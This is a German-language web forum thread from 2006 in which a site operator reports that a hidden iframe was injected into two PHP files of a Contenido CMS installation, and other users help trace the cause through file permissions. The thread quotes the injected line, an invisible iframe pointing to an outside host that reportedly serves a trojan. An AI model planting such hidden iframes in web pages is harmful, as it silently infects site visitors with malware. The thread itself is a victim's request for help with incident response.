Sicherheitslücke?

phpchris · Beitrag von **phpchris** » Fr 17. Nov 2006, 11:41

Hallo Leute,

ich brauche mal einen Tip.
Wir setzen momentan eine Contenido Version 4.6.8 ein.
Irgendwie wurde in der front_content.php und in der index.php (von mir selbst erstellte Weiterleitung) eine zeile angefügt:

Code: Alles auswählen

<iframe SRC="http://dianajava.com/stat" WIDTH=1500 HEIGHT=1500 style="display:none"></iframe>

Diese Seite schubst den Usern einen Trojaner unter.

Ich vermute, dass diese Zeilen dort per Sicherheitslücke eingefügt wurden, weil ich FTP-Zugriff ausschließen kann.
Hat jemand eine Idee, wie ich dieser Lücke auf die Spur komme, oder zurückverfolgen kann, wie diese Zeile dort reingeschrieben wurde?

Die Contenido-Logs sagen nichts besonderes aus...

kummer · Beitrag von **kummer** » Fr 17. Nov 2006, 15:05

diese zeile findet sich jetzt in den dateien wieder? oder wurden sie in die datenbank geschrieben?

phpchris · Beitrag von **phpchris** » Di 21. Nov 2006, 09:55

kummer hat geschrieben:diese zeile findet sich jetzt in den dateien wieder? oder wurden sie in die datenbank geschrieben?

Ja, in den Dateien findet sich diese Zeile wieder.
Hab sie rausgelöscht und warte grad ab, ob Sie wieder erscheint.

kummer · Beitrag von **kummer** » Di 21. Nov 2006, 10:33

welche recht weisen denn diese dateien auf?

phpchris · Beitrag von **phpchris** » Mi 22. Nov 2006, 09:39

Schreibrechte nur Benutzer, rest hatte das Recht zum Lesen.
Habe das Schreibrecht auch entfernt und es scheint nicht wieder aufgetaucht zu sein!
Ich warte noch ab...